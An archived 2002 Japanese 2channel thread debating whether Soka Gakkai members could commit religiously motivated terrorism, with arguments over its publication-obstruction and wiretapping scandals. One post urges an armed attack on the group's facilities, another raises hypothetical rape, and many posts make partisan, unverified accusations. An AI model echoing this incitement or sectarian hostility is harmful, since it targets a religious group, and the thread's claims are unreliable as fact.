2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

創価学会員による仏罰テロの可能性

1 :名無しさん@お腹いっぱい。:02/07/05 14:54 ID:???
を考察する!

2 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/05 15:02 ID:/LQXZ5D5
ありません。

私の頭はいまだに七分割されていませんので。(藁)

3 :名無しさん@お腹いっぱい。:02/07/07 10:09 ID:???
大いにあります

4 :名無しさん@お腹いっぱい。:02/07/07 10:21 ID:KOD01OYK
悪と徹底的に戦え!!
先生のご指令どおり 正義感をもって学会の悪を訴えて参ります。

5 :もとけん:02/07/07 10:31 ID:BNRJm9J9
糞スレ立てないで下さい


6 :名無しさん@お腹いっぱい。:02/07/07 11:25 ID:???
「ありません。」って、また層化の擁護するなよ、アホ



7 :名無しさん@お腹いっぱい。:02/07/07 13:54 ID:???
オウムだって軍事クーデターをやらかしたんだから、創価が出来ない筈は無い!

8 :名無しさん@お腹いっぱい。:02/07/07 14:00 ID:???
>1
ありえますね。
以下のスレによると、
創価学会員があるアンチに対してしたらば掲示板で、
「テロ予告」をしているそうです。
http://kaba.2ch.net/test/read.cgi/koumei/1023460551/l50

9 :波木井坊竜尊@日蓮宗葵講 ◆tfDpfKU. :02/07/07 14:08 ID:pcycFBjR
>>6
援護じゃありません。学会には功徳もなければ法力もない。だいたい間違って
いるから、私の頭が七つに割れることもない、って言ってるんです。

だいたい日興上人の出自の大井氏は波木井とは親戚関係。鶴の丸印は、
波木井の紋ですよ。日興上人が、私の頭をひっぱたくぐらいはあるかも
しれませんが、割る、とか不幸にするなんてあるわけはない。
子孫の頭わる先祖なんかいやしません。

10 :6:02/07/07 16:21 ID:???
そうなのか、、、、、
アホ呼ばわりしてごめんな

11 :名無しさん@お腹いっぱい。:02/07/07 17:46 ID:???
じゃあやられる前に全国の層化サティアンを一斉襲撃しようぜ。やられる前にやる!全員射殺!
それが世界平和のためだ


12 :戸田先生のセリフ:02/07/07 22:03 ID:???
すでに過去の歴史に君と同じ考えを持った先輩がいたのだ。それが暴力で事を決しようとテロリスト達だ。社会悪に挑戦して少しばかり真剣に考えれば誰でも一応はたどりつく結論といえるだろう。だがこれはまことに幼稚きわまりない考え方だ。(続)

13 :戸田先生のセリフ:02/07/07 22:07 ID:???
なぜかというにいつも言う通り仏法は三世にわたる厳然たる生命の尊厳さを説く。したがって人を殺すことはこれ以上の反逆はない。人が人を殺す…それで社会が住み良くなったような気がしてもそれは一人ヨガリです。

14 :つまり:02/07/07 22:12 ID:DVIbKEL2
創価学会によるテロ行為など創価学会を知らぬ者の妄想に過ぎないのです。

15 :政教分離名無しさん:02/07/07 23:00 ID:Eh20jcQx

例えば、創価学会系墓地造営に反対する市民運動のリーダー宅に
ブルドーザーで突っ込んで日本刀で斬殺する、という行為はテロであろうか??

違うな、タダの組織犯罪だ

 
 

16 :名無しさん@お腹いっぱい。:02/07/07 23:25 ID:l0+J6Vj6
>9波木井さんに申し上げます。学会には功徳もなければ法力もない?
そんなことありません。私は会員ですが 活動はしていません。学会嫌いです。
池田の言うことも信じておりません。学会は法を下げていると思っています。家族も同じ気持ちです。
でも ご本尊様を信じて、朝晩の勤行をし慈悲の心を忘れずまじめに生きています。
そして 功徳は何回か体験し いつも守られていると実感することが多いです。ひとつご紹介しましょう。

阪神大震災のとき 甥が泊まりに来ていました。
例のあの時間帯は、わたくしの母は朝の勤行をしている時間でした。
何年来 同じ時間 欠かすことなく。
でもその日に限り 母は甥の上着のボタンがとれていたことを思い出し
甥の枕もとで ボタンをつけていたのです。
その時 突然 母の背中をタンスが直撃しました。
母は打撲で 完治するのに1ヶ月かかりましたが もしその場にいなかったら
タンスは、2歳の甥をまともに直撃する位置にありました。 たぶん 打撲だけではすまなかでしょう。
これが 功徳というものではないのでしょうか。




17 :15さんへ:02/07/07 23:30 ID:YouT3AId
テロと組織犯罪は違うぞと?テロは起こさなくても組織犯罪は起こすだろうと?無差別テロも特定のアンチ学会的人間の抹殺も殺人には変わらないじゃないんですか?大体あなたは人とを何故殺しては行けないか観念的もしくは実感としてわかってますか?(続)

18 :15さんへ:02/07/07 23:34 ID:5IM0xkQD
創価学会がそんな団体ならあんたは何をしている?あんたの周りにはあんたの知らない学会員がウジャウジャいるわけです。こんなところでそんな書き込みをしていることが創価のあんたの想像もしない人脈やらでばれたら…シラネー

19 :15:02/07/07 23:34 ID:???
>>17

あなたの文章は非常に散漫で、何がいいたいのか良く分からないのだが?


20 :15さんへ:02/07/07 23:38 ID:PkxDShPX
因みに創価系墓地に反対派のリーダー的人物の家の窓ガラスを熱心な創価学会員が投石にて破壊したら!?イタ電話一日5億回かけたら!?リーダーに関係する全ての女をレイプしたら!?どーなる!?

21 :15さんへ:02/07/07 23:41 ID:A91EO0FG
答えは簡単。然るべき刑期を与えられます。そこをアンチに言わせたら、警察の上の方に既に学会員がいて…と。いっつも妄想ばっか。

22 :15:02/07/07 23:57 ID:???
>>17-18
>>20-21

よくは分からんが、毎回IDが変わる環境がウラヤマスィ…


ところで、以下のような事件は「言論のテロリズム」と いえるだろうか?
ちなみに池田太作氏も、この事件があったことは認めています。

--------------------------------------------------------------------
【言論弾圧事件(出版妨害事件)】

 1969年に藤原弘達氏の『創価学会を斬る』をめぐって公明党
委員長の要請で田中角栄自民党幹事長(当時)が著者に「初版分は
全部買い取る」ことを条件に、出版の中止を求めた。
著者は出版の意思を崩さなかったため、大手取次店に圧力をかけ、
配本をしないようにさせた。一般紙も広告掲載を断わるようになり、
国鉄・私鉄も中づり広告を断るなどの事態になった。また、この本を
直接出版社からとりよせた書店も、脅迫、いやがらせを受けた。
--------------------------------------------------------------------

 


23 :19さんへ:02/07/07 23:59 ID:tp5jfE+w
散漫か…当たってます。質問します。答えてくれなくてもいいけど。創価が本当にそんなことをするかもしれない団体であると思いますか?まあどっちでもいいけど

24 :名無しさん@お腹いっぱい。:02/07/08 00:15 ID:ZxdjuAMN
>23
しないよ
ノーベル賞ねらってるんだぜ。

25 :19.15さん:02/07/08 00:20 ID:OrABiGdQ
IDがまいかいかわるのはわかりません。ただ端末はezwebです。しかもこの端末たまに辞書が壊れます。いま壊れてます…(略)この事件は何がもんだいか。まずはその出版物に嘘八百は載ってなかったか。(続)

26 :てすと:02/07/08 00:27 ID:DN4ooMR+


27 :名無しさん@お腹いっぱい。:02/07/08 00:35 ID:mOb1kL/l
仏罰テロなるものがあれば、いまごろ山崎正友なんぞ何度も殺されてますがな(笑
1もくだらんこと考えずに自分の脳内の心配でもしておきなさい。


28 :名無しさん@お腹いっぱい。:02/07/08 00:36 ID:???
>>27
わろた。

29 :19さん:02/07/08 00:42 ID:yp+Mtlq9
(端末辞書調子わるし)この事件がもんだいなのは「権力による不当な言論弾圧」があったかなかったかですね?ムズーイ俺は専門家じゃないですからね。しょうばいのせかいではよくあることなんじゃないですか?(続)

30 :19さん:02/07/08 00:49 ID:C65rhA0y
「個人情報保護法」は憲法いはんのにおいプンプンですが…(略)圧力をかけるというやり方はいやらしいですね。ですが「いほう」なんでしょうか?創価学会を斬るという学会につごうのわるいしゅっぱんぶつを力任せに潰したところがふゆかいなわけですよね?

31 :19さん:02/07/08 00:54 ID:RzW9USCl
だとしたら答えは簡単。いまならいざしれずその頃の出版物に創価学会のことをまともに報道しているところはありません。いまでもダイタスウがそうです。創価学会の報道は常に事実無根。つぶされてセイカイ。(続)

32 :19さん:02/07/08 01:01 ID:xG7DRIVl
言論のテロリズムとは、言論の自由を逆手にとって無秩序に報道することをいうのでは?週刊新潮の報道ないようと創価学会の起こしたさいばんの結果を見てください。「創価学会を斬る」も同じような傾向のないようであることはスイソクつきます。(続)

33 :15(19):02/07/08 01:02 ID:???

現在の創価学会員は「言論弾圧事件」のことを知らないのでしょうか??

この創価学会の組織的な出版妨害行為が、物議を醸し、国会でも
取り上げられ、共産党などから「池田大作の証人喚問」まで要求
される事態となり、それを阻止するために、創価学会は 共産党
委員長(当時)宮本氏自宅と立正佼正会の電話を盗聴したんだよ。
それも速攻でバレる。共産党の方ずーっと上手だった。

この、

    創価学会の悪質な組織犯罪の2連発

が晒されて日本中の非難を浴び、珍しく池田大作氏も観念し、事件を
認め一応反省の弁を述べました。世間一般に

    創価学会は、いかがわしい集団

という印象を与えるのに十分すぎる事件's だったんだけど、本当に
今の創価学会員は こんなことも知らんの??


34 :名無しさん@お腹いっぱい。:02/07/08 01:07 ID:???
>>33
キミは強酸かね。
>共産党委員長(当時)宮本氏自宅と立正佼正会の電話を盗聴したんだよ。
>それも速攻でバレる。共産党の方ずーっと上手だった。

宮本宅盗聴がばれたのは10年後。「速攻」ではない。しかも、実行犯
の元顧問弁護士がばらしたのであって、強酸は棚ぼたで事実を知ったに
過ぎない。しかも、盗聴は、裁判終結後の情報から顧問弁護士による
独自の犯行であったことが明確になっている。

こんなこともしらんの?


35 :33さん:02/07/08 01:09 ID:VIOUswsP
しらないですー(笑)そりゃ…創価学会ってどげなダンタイじゃゴルァー(゜Д゜)y―~~ともいいたくなりますな普通。だけどなぁ…盗聴ってちょっと尋常じゃないね?きもいな。いっぱい喋ってごめんなさいね。(続)

36 :名無しさん@お腹いっぱい。:02/07/08 01:11 ID:???
>>34
裁判ではどうなったのよ?

37 :33さん:02/07/08 01:14 ID:T8FccFFP
僕としてはそれでもこの信仰を続けます。なぜならその事件が事実だろうとそうじゃなかろうと、あるいみ他人事なわけです。ニケーソが自分を本仏だといおうが既に本仏は日蓮だいしょう人だし、個人的信仰のレベルにはかんけいないんです。(続)

38 :名無しさん@お腹いっぱい。:02/07/08 01:20 ID:crqmvOw5
>>34
>独自の犯行であったことが明確になっている。

まだ、そんなこと言ってるのか。アフォ。

39 :33さん:02/07/08 01:21 ID:DN4ooMR+
んー話がそれました。しゃかいてきいんしょうはさいあくですね。それに関してはいうことは個人的にはありません。個人的には「やり方がまずかった」と捉えます。事実無根の出版物は創価学会のごかいを招くでしょうし。(続)

40 :15(19):02/07/08 01:21 ID:???
> 宮本宅盗聴がばれたのは10年後。「速攻」ではない。しかも、実行犯
> の元顧問弁護士がばらしたのであって、強酸は棚ぼたで事実を知ったに
> 過ぎない。しかも、盗聴は、裁判終結後の情報から顧問弁護士による
> 独自の犯行であったことが明確になっている。

北条元会長が盗聴の指示を出した,と裁判所は判決を出した
わけですね.これが組織的関与でなくてなんなんでしょう?
組織的関与でなく、顧問弁護士個人の犯罪だ,というなら、
サリンを撒いたのも個人がやったことで,
オウム真理教が組織的に関与したのではない、
となってしまいます。

それともう一つ確認したいことが。
創価学会員は

「裁判で創価学会に不利な判決が下されたら、それを否定する」

のでしょうか? ある事件については「裁判で認められた!あいつは
買春した!」と騒いでおきながら、盗聴事件については「裁判は間違
いで、裁判終結後に創価はシロであることが分かった」では

 自己撞着がひどすぎる

と感じますが。


41 :名無しさん@お腹いっぱい。:02/07/08 01:28 ID:crqmvOw5
>>34
学会内部だけで通用するデマに踊らされていたと、
ようやく気付いたのか?
デマを流した幹部を恨むんじゃないぞ。
とんでもネタを信じた、おのれを恥じろ(藁

42 :33さん:02/07/08 01:32 ID:yp+Mtlq9
てな感じです。読みにくいでしょうが勘弁してください。もう寝ますけど僕から個人的に話します。他はおいといて、まず自分がどうするかに夢中になった方がいいと僕は思う。そりゃ目の前で事件が起きてるなら別ですが…。(続)

43 :33さん:02/07/08 01:39 ID:xG7DRIVl
僕は創価学会の昔のことや日蓮正宗とのかんけいには興味はない。「この自分はどうするか」それで手いっぱいかな。…は?いみわからん。ま、また来ます。

44 :15(19,33,40):02/07/08 01:43 ID:???
>>42
> まず自分が どうするかに夢中になった方がいいと僕は思う。

自分自身の人間的成長を大事に思うなら、創価学会のような
いかがわしい団体と つき合うべきではありませんね。
「この板に出入りすべきじゃない」ということかな?


45 :15さん:02/07/08 01:51 ID:IYa5JbxQ
いかがわしいダンタイかぁ…。そのいかがわしいって、その事件が主でいってるの?なら…ドンマーイ!とはいかないか。あのさ、もう徹夜覚悟で話すけど、アンチな人に共通してるのは、「そういう事件があったなかったの前に」創価学会を「引きずり落とそう」としてる。(続)

46 :名無しさん@お腹いっぱい。:02/07/08 01:57 ID:crqmvOw5
>>45
暇だからブラインドタッチの練習。
朝日新聞の一面記事、見出しより

『北条副会長(当時)の関与認定』
『宮本邸盗聴 創価学会側四人に慰謝料命令』
『(北条)承認し資金提供』
『「山崎独断」退ける』

47 :15さん:02/07/08 02:00 ID:w5jHccaW
親父が今年の2月18日に死んだんだけど、俺がガッカイの葬儀(友人葬)でやるっていったら親父の姉が「ガッカイは香典を持っていく」っていうわけ。がっかい葬は当然ちいきのガッカイインにやってもらうわけなんだけど、(続)

48 :名無しさん@お腹いっぱい。:02/07/08 02:01 ID:crqmvOw5
いまだに「山崎独断」って言ってるだろう。
だからアフォと言ったんだよ。
あ、これは>>34さんに・・・。

49 :15(19,33,40,44):02/07/08 02:03 ID:???
オウム真理教は、サリン事件で社会的信用を完全に失った。
それ以前はオウムの思想に理解、感心を示す学者、文化人が結構いた。

犯罪を犯した人間が白い目で見られるのは当たり前!
犯罪を犯した団体が白い目で見られるのは当たり前!


>>45
そんなに創価学会を擁護したいのなら、創価学会の良い点の一つでも
挙げては いかがですか?


> 学会を「引きずり落とそう」としてる。

こういう被害者意識は、オウム信者と同じです、と言われるYO!


50 :15(19,33,40,44,49):02/07/08 02:06 ID:???
>>47

貴殿のハンドルネームである「15さん」とは、
「15さんへ」という意味なんでしょうね。
>>15 は私ですから。

誤解されるので「へ」を付けるなど、表記を改めて頂きたく
存じます。


51 :15さん:02/07/08 02:06 ID:C65rhA0y
ガッカイインっていったって別に創価の会館の中だけに住んでるわけじゃないわけ。まいにち出勤して畑耕してかいものしたり…土着の庶民なわけ。そんなオッサンオバハンらがかいじょうをうろついてるところでその叔母にいってやった(続)

52 :名無しさん@お腹いっぱい。:02/07/08 02:10 ID:???
裁判記録 創価学会の電話盗聴
著者: 日本共産党 中央委員会
訳者:
出版社: 日本共産党 出版局
税別価格: 4175円
ISBN: 4530042944
ISBNC分類: 政治(含む国防軍事)
発行: 1990年02月01日

【 紹介文 】
創価学会最高幹部がかかわった日本共産党 宮本顕治氏宅電話盗聴事件を追及、
断罪した訴訟記録・判決文を収録。民主主義と人権を守るたたかいの貴重な記録。


【 目次 】
訴状(創価学会による日本共産党 宮本顕治氏宅電話盗聴事件にかんする訴状);
第1審最終準備書面(本件訴訟の重大な意義と創価学会による電話盗聴の実態);
第1審判決(通信の秘密、政治活動の自由、プライバシーの権利の侵害は明らか);
第2審第1準備書面(盗聴事件の謀略的本質とその実態);
第2審第2準備書面(言論出版妨害事件と北条創価学会会長の盗聴動機、関与);
第2審第3準備書面(北条創価学会会長の責任を認めた原判決は正当である);
第2審第4準備書面(組織的な口封じ工作と謀略的な訴訟戦術について);
第2審=控訴審判決(控訴棄却、北条は盗聴に関与した)

53 :15さん:02/07/08 02:13 ID:VIOUswsP
「この中で誰が香典を持っていくの?」と。馬鹿ですよ。名もない爺婆を泥棒あつかい。叔母は一瞬びっくりしてた。なにしろ通夜の準備してるガッカイイン目の前でいったわけだから。プププー (続)

54 :15さん:02/07/08 02:19 ID:xtz0/HzD
数日後ショナヌカのため連絡を叔母にもとったんですが、電話で遠回しにガッカイ形式はやめろっていってきた。こいつ馬鹿だろ?親父の姉で親父はソンケイしてたから俺もなんとなくそうだった。ただのオジンオバンを捕まえて香典泥棒だと30も年下の俺に嘘吹く(続)

55 :名無しさん@お腹いっぱい。:02/07/08 02:20 ID:???
↑サムいよ

56 :15さん:02/07/08 02:24 ID:DN4ooMR+
叔母への個人的憤怒の話はさておき、アンチの本質は「事実はどうあれとりあえずガッカイをみとめたくない」だと思う。それがセイキョウ新聞のいうところの「嫉妬」。 (ё)/オヤプミー!

57 :15さんへ:02/07/08 02:33 ID:yp+Mtlq9
49を読みました。はんざいをおかしたらしろいめで見られるのは当たり前!納得!引きずり落とそうとしていると感じてるのはヒガイシャイシキじゃなくレイセイな判断です。だけど15さんの「しろいめで…」は当てはまりませんね。

58 :15(19,33,40,44,49,50):02/07/08 02:39 ID:???
ezweb氏の話をまとめると、

 ezweb氏の父親が亡くなった。(父親は創価学会員だったのかな?)
 創価学会形式いわゆる「学会葬」で葬式を挙げることにしたが、
 (喪主は ezweb氏なのか?)叔母が反対してきた。いわく「創価学
 会員は香典を持ち去っていく」


ただ それだけの話だけど、これが ”セイキョウ新聞のいうところの「嫉妬」”なの??

ただ単に「世間の人から創価学会というのは全然信用されていない」としか
読めないけど? で、実際父親の葬儀で集まった香典はどうなったんですか?

葬式の準備をした見返りに創価学会が全部持っていったんですか?
それなら叔母が心配し、猜疑心を持つのも当然ですわな。


59 :名無しさん@お腹いっぱい。:02/07/08 02:42 ID:???
「15さんへ」さんへ
もう遅いから、今夜はもう寝なさい。
また明日、ね。

60 :名無しさん:02/07/08 02:44 ID:GrjqipU4
真性ホラー!!仏罰の恐怖は、いまここにいるあなた達に降りかかる!

嬉々として仏罰の恐怖を語る学会幹部の報告は、下↓の通りでやんす!
【現・創価学会全国婦人部長の御言葉 退転者の顛末〜戦慄の報告!】
 http://www14.u-page.so-net.ne.jp/cb4/toride/AUD/meiyoki.wav

兄は遺族とそこに関わる人達を「脱会」させました!!
しかし、「厳罰」で平成7年、癌でその病院始まって以来の断末魔の阿鼻叫喚
の叫び・呻きの中で死亡!さらに妹も、平成9年、癌でもだえ苦しみながら死亡!
またついこの今月25日には、兄にそそのかされて脱会した○○町の△△寺の
元高僧が同じく癌で死亡したとの報告がありました!!


61 :15(19,33,40,44,49,50,58):02/07/08 02:46 ID:???
>>57
> 引きずり落とそうとしていると感じてるのは
> ヒガイシャイシキじゃなくレイセイな判断です。

創価学会は 出版妨害事件、電話盗聴事件 という犯罪を犯しました。
これは犯罪です。創価学会は犯罪を犯したのです。
だから創価学会は、世間から白い目で見られるのです。

ezweb氏は、理解することを拒否しているようですが、
何度でも指摘させてもらいます。


62 :名無しさん:02/07/08 02:49 ID:GrjqipU4
みんな、癌保険入ってる?
第一生命だったっけ?
癌にかかってからの保険料は一切いただきません!というのは?


63 :59:02/07/08 02:52 ID:???
「15さんへ」さんへ
寝るのはいいけど、お休みなさいは?
ネチケットだよ。

64 :名無しさん@お腹いっぱい。:02/07/08 02:53 ID:QEG6iwJw
> 癌でもだえ苦しみながら死亡!

こういうことを、明るく朗らかに楽しそうに語る様子にはゾッとします。
創価カルトにハマると、人間ここまで残虐になれるのでしょうか…


65 :アンジェニュー@福永恵治 ◆n3doSoyY :02/07/08 03:07 ID:W8YDoDhj
ワールドカップの対戦国チームにエールを贈るようにはいかないようで、、

66 :名無しさん:02/07/08 04:02 ID:GrjqipU4
>>64
>創価カルトにハマると、人間ここまで残虐になれるのでしょうか…

それが、恐ろしいことになれるんですよ。
イスラム世界に「アラブの大儀」というものが有りますが、
学会にも「学会正義」というものがあります。

先生を守るためなら、死すら厭わない連中ですから、仏罰を
受けた退会者は、なるべくしてなったと思っているはずです。
それが厳粛なる因果応報の仏法原理なのですから。

詳しいことは、最寄りの学会員迄お問い合わせ下さいませ。(w



67 :名無しさん@お腹いっぱい。:02/07/08 08:33 ID:1qZgXnra
創価にはいると自己中心性を克服できますが、先生中心主義を植え付けられるんですね。

先生の利益にならないことは絶対に許さない!とそれで我が身を捨ててでも先生をお守りするわけですよ。
これはもう多くのカルトに共通してる現象ですね。

68 :ezweb:02/07/08 12:22 ID:xG7DRIVl
15さん、結局やっぱり香典は盗まれませんでした。これが事実なわけです。叔母は創価学会の社会的信用のなさからの猜疑心で他人から聞かされた「学会員は香典を盗む」ということを、さも自分が見たように大確信で語ったのでしょうか?違います。(続)

69 :ezweb:02/07/08 12:30 ID:T8FccFFP
「創価学会の何かが許せない」のではないでしょうか?因みに盗聴は犯罪です(断定)しかしアンチの人達は(叔母を含む)創価学会が明確な触法行為をしたかしてないかは関係なくアラ探しをするのでは?シマイには事実無根の記事を垂れ流す。どうですか?(続)

70 :ezweb:02/07/08 12:38 ID:/zgR6C1t
15さんも正攻法で創価学会を攻めますが、根底は同じですよね?…僕の友達(因みに学会員)は池田先生が世界の大学やら市長やらから名誉教授だの名誉市民だのを受けたのは金を払ってやってるんだって。(続)

71 :ezweb:02/07/08 12:42 ID:9BT5mJ0Q
自分の知らない部分を勝手に解釈して埋めてしまうわけです。なぜそんなことをするのかというと、あんなに一人の人を世界がよってたかって称賛するのになぜなのか誰も教えてくれない。「教えろよ!同じくらいカマってくれよ!」と言いたいが言えない。(続)

72 :名無しさん@お腹いっぱい。:02/07/08 12:42 ID:HsmGJNT5
>>70
> 15さんも正攻法で創価学会を攻めますが、根底は同じですよね?

アナタも >>15氏の問いかけには まともに答えずに、アラ探しで誤魔化していますね。


73 :ezweb:02/07/08 12:51 ID:MGqS/F+T
そこで、考えうる下劣な妄想を事実と決めつけ手の上に乗せる。それで自尊心やなんかを守ってる。レイプ、下げ渡し、買収、宗教ビジネスと極端に下劣。しかし15さん、あなたは理性でそれらが下等で先がないことを見抜き妄想を打ち払っての「言論弾圧」ですね。(続)

74 :ezweb:02/07/08 12:54 ID:VIOUswsP
それなら15さん、その1976年(でしたっけか?)のその事件のことで創価学会に何をさせますか?またそのことで導き出されることはありますか?創価学会を処断して下さい。

75 :名無しさん@お腹いっぱい。:02/07/08 12:58 ID:HsmGJNT5
ezweb氏よ。創価学会や池田大作が、そんなに立派なのなら、
>>60 の音声データの、創価学会を脱退した者たちが
「癌でもだえ苦しみながら死亡!」と嬉しそうに発言している
のは一体何なのだ? 創価学会に従わない人間が苦しんで死ぬ
のが そんなに嬉しいのか? ezweb氏よ、創価学会に批判的な
人間が苦しんで死んだら、ezweb氏よ、アンタも喜ぶのか?
そういう考えは極端に下劣ではないのか?
そんな組織、構成員のどこが立派なのか?

76 :名無しさん@お腹いっぱい。:02/07/08 13:17 ID:???
読んでいると、学会員さんらしき方は必死で学会の正しさを強調していますが、
「なんで創価学会は、こんなに世間から嫌われているのか」と考えたことがありますか?
普通の家庭や職場で創価学会の名をだすと、ほとんどの人が訝しがります。

あなたがたは、それを「嫉妬」とか「マスコミによる中傷」とか言いますが、
私みたいな一般人は、学会関係の情報に接することは ほとんどありません。
テレビや新聞に出ないのから当たり前です。マスコミによる中傷って一体
何ですか??

 電車の中吊り広告などで、創価学会関係の出版物などを知ることは
多いです。しかし、あれだけ毎日のように電車のポスターで目にしても
世間一般の人は「創価学会や池田氏は すごいんだ」とは思いません。

マスコミが創価学会批判をしなくても、たくさん広告を出しても、
一般市民の創価学会に対する印象は、全然良くなりません。
あれだけ広告しても公明党の支持率は上がらない。

もう少し、自分たちの存在を第三者的視点で考えてみてはどうですか?


77 :ezweb:02/07/08 16:59 ID:Z7zfksDw
みなさんちょっと待っててね。まだ仕事中なんです。ezwebではやっとここ最近書き込みが可能になったんです。それまでは閲覧のみ。答えてあげられることもたくさんありました。僕の思うことをちゃんと伝えたいです。夜まで待ってください。

78 :名無しさん@お腹いっぱい。:02/07/08 17:10 ID:???
ケータイでやってんの?大変だね

79 :ezweb:02/07/08 21:29 ID:VIOUswsP
ごめんなさーい。ここで話すのってエネルギーいるから今日は勘弁してー。昨日は深夜二時までここにいたからネムーイ。だから一方的に少し話して寝ます。池田先生とか創価学会をこき落とそうとする人達の主張が多分わかりました(続)

80 :ezweb:02/07/08 21:39 ID:C65rhA0y
あなた達は僕ら学会員が、先生唯一完璧正義、マンセー、完全無血だと主張してやまないと思ってるんじゃないですか?だから事実無根の記事や綻びを見付けてはいつも学会員に見せ付ける。はっきり言って完璧じゃないよ。常に正義じゃないよ。(続)

81 :名無しさん@お腹いっぱい。:02/07/08 21:41 ID:???
どうぞごゆっくり

82 :名無しさん@お腹いっぱい。:02/07/08 21:43 ID:???
>>80
ezwebさん。
でも創価学会員って、基本的に、完璧だ正義だというようなこと言ってるよ。

83 :名無しさん@お腹いっぱい。:02/07/08 21:48 ID:???
わはは、
完璧だ、正義だと言ってる言ってないの議論になるのか?

馬鹿馬鹿しいね。

毎日、盛況新聞で言ってるじゃないかあ!

84 :ezweb:02/07/08 21:49 ID:xG7DRIVl
盗聴は犯罪。以上。池田先生が凄いのは、名誉称号を多数受けたからじゃないでしょ。凄いからそうなる。称号は後からついてきただけ。創価学会は日蓮大正人の金言通り実践してるだけ。なぜそれが選挙やら民音やら宇宙になるのかを問われればながーくなるので。(続)

85 :ezweb:02/07/08 21:58 ID:KGPR4nz5
話がそれたけど、あなた達の主張をもっと詳しくいうと、創価学会の主張や態度は地位や名誉のないただの人間を見下している。学会員以外の人間を認めようとしない学会員はアフォだと。そんな団体は悪だと。だいたい合ってます?(続)

86 :ezweb:02/07/08 22:07 ID:RzW9USCl
創価学会の思想は実は全く逆。特権階級や地位名誉のある人間にではなく、ただの人間に光を当てる。娑婆即寂光土、即身成仏なわけです。決定的なセリフですが、学会員が社会的常識のある非学会員大多数と同じ目で学会を見れないのは内側を知ってるから。(続)

87 :名無しさん@お腹いっぱい。:02/07/08 22:11 ID:???
考え方が、幼いですよ。
本当に、「凄いからそうなる。称号は後からついてきただけ。」と言うなら、誰もが
流石にこれは、と思うような賞や称号を受けてからにすべき。

本人の業績その物ではなく、金や政治力によって授けられたんではないかとの疑いを
抱かせるような物では、意味ないでしょう。
今日の独裁者その他胡散臭い連中を見て御覧なさい。
よく胸に勲章などをたくさん着けているでしょう。
なんか、どこが違うのかわからないんですがね。

88 :ezweb:02/07/08 22:11 ID:/zgR6C1t
見たこともないのに知りもしないのに落とそうとするのはやっぱりおかしいよ。アンチは先生のこともっと知るべきだ。

89 :名無しさん@お腹いっぱい。:02/07/08 22:12 ID:???
認識なくして評価なし

90 :ezweb:02/07/08 22:13 ID:MGqS/F+T
一方的ですが今日はもう(-д-)y

91 :名無しさん@お腹いっぱい。:02/07/08 22:14 ID:???
やっぱり

ezweb = なりすまし学会員 ??

言ってることが、いちいちおかしい。変。わざとらしい。

92 :名無しさん@お腹いっぱい。:02/07/08 22:16 ID:???
私は、二世のアンチですよ。
あなたも、創価学会の行っている事の極一部しか知らないでしょ。
同じですよ。

93 :名無しさん@お腹いっぱい。:02/07/08 22:18 ID:???
>>92
そうだが、ほどがあるんじゃないか?

94 :創価は公認カルト:02/07/08 22:19 ID:???
>ezweb さん
私は学会員に慈悲を感じても、嫉妬は感じていません。
ここのアンチは殆どがそうじゃないですか?
どーして二言目には嫉妬と言うのですか?意味がわかりません・・・

「池田がお金で称号を買っている事実を示せ」と言うのなら、貴方は
池田のする事をドコまで知っているのですか?
池田が発展途上国で学校を建てたり、寄付をしたりして、見返りに名誉
○○を貰ってるのは事実でしょう?
そんなに素晴らしい人なら、その称号をくれた人の何人が、称号をくれ
た町の市長の何人が学会員になったのですか?
少なくても、学校長・市長の誰一人学会員になってないのでは?
学会員は、内部の話を簡単に信じ過ぎじゃないですか?

95 :名無しさん@お腹いっぱい。:02/07/08 22:20 ID:???
ほどと言うと?

96 :名無しさん@お腹いっぱい。:02/07/08 22:28 ID:???
>>95
利敵行為

97 :ezweb:02/07/08 22:28 ID:Z7zfksDw
87さん 先生が実際に何をして名誉称号をうけまくってるんでしょうか?あげてもいいからあげてるんです。それは先生の功績を知らない人のセリフですよ。

98 :ezweb:02/07/08 22:32 ID:MGqS/F+T
91さん 広島県高田郡吉田町長屋に住む三世ですが何か。今のところこのスレでは僕の偽物はいないみたいですが。わざとらしいのは相手の言うことを心底理解してこっちの伝えたいことを心底理解してもらいたいからかも。

99 :名無しさん@お腹いっぱい。:02/07/08 22:33 ID:???
>>96
意味がわからないんですが?

>>97
そんなに凄い功績のある人が叙勲されたりするのに、何故、日本の一般社で会話題に
ならないんですか?
一般紙に池田氏の叙勲の話が載ったのを見た事ないですが。

100 :名無しさん@お腹いっぱい。:02/07/08 22:35 ID:???
「で」の位置がおかしかったです。
すみません。

101 :名無しさん@お腹いっぱい。:02/07/08 22:35 ID:YM1vM+Om
仏罰テロ(゚д゚)コワー

102 :ezweb:02/07/08 22:39 ID:DN4ooMR+
94さん 嫉妬についてはこのスレで分かりやすく(多分)載せてます。先生の名誉称号他が純粋なやりとりではなくバーター取引や買収的な行為でないと何故言いきれるか、ってことですね。それはやっぱり先生の中身を知れば…。

103 :ezweb:02/07/08 22:45 ID:IYa5JbxQ
ここで暖めてた言葉を少々。池田先生が名誉称号を受けたことに対して先生の功績を追跡もせずに金が動いたと済ませる人は、今の濁世にMCされている…YO!僕は疑り深い。先生の功績を認めてる期間より毛嫌いしてた期間の方が長いです。眠い…

104 :名無しさん@お腹いっぱい。:02/07/08 22:46 ID:???
>>102 
ezwebさん。
私は、>94さんではないですが、目の前で池田氏を見た事もあるんですがね。
余り良い印象は持てませんでしたね。
特に話の内容が、本などを読んだ時の印象と違いすぎる。
ゴーストライターがいると言うのも、否定できんと思いましたよ。
もちろんこれについては、それ以上何の根拠もないですが。

105 :名無しさん@お腹いっぱい。:02/07/08 22:46 ID:YM1vM+Om
>>102で、大作に何ができるの?ただ、ちょっと金と権力をもってるだけじゃん。
寄付行為ならだれでもできる。
だいたい寄付をした!とか言って喜んでるのって、
本来の寄付行為と、方向性間違ってるんじゃないの?


106 :名無しさん@お腹いっぱい。:02/07/08 22:52 ID:???
その金と権力がハンパじゃないから困ってるんだよw

107 :ezweb:02/07/08 22:52 ID:C65rhA0y
…僕は思う。どうして池田先生のことを調べないのかと。僕は僕なりに調べましたよ。嫌うべきか崇拝すべきか好むべきか尊敬すべきかを。三流雑誌は駄目ですよ。アインシュタインのところの、e=mc三乗よりも生涯童貞だった的スタンスですから。

108 :名無しさん@お腹いっぱい。:02/07/08 22:57 ID:???
>>107一流雑誌は聖教新聞ですか?(激藁
あと、ガキが無い頭を絞って難しいこと書かなくてもいいよ(藁

